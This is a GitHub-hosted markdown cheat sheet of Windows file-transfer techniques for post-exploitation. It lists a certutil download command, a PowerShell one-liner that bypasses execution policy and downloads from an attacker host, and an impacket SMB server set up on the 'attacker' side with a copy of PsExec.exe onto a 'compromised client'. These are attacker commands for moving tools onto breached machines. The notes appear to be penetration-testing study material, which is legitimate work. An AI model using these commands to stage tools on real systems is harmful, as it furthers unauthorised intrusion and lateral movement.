Skip to content

Latest commit

 

History

History
17 lines (16 loc) · 424 Bytes

file_transfer_windows.md

File metadata and controls

17 lines (16 loc) · 424 Bytes

windows' file transfer

certutil

certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]

powershell

powershell -ExecutionPolicy Bypass -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')

smb

#attacker
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py share ./
#compromised client
copy \\192.168.119.163\share\PsExec.exe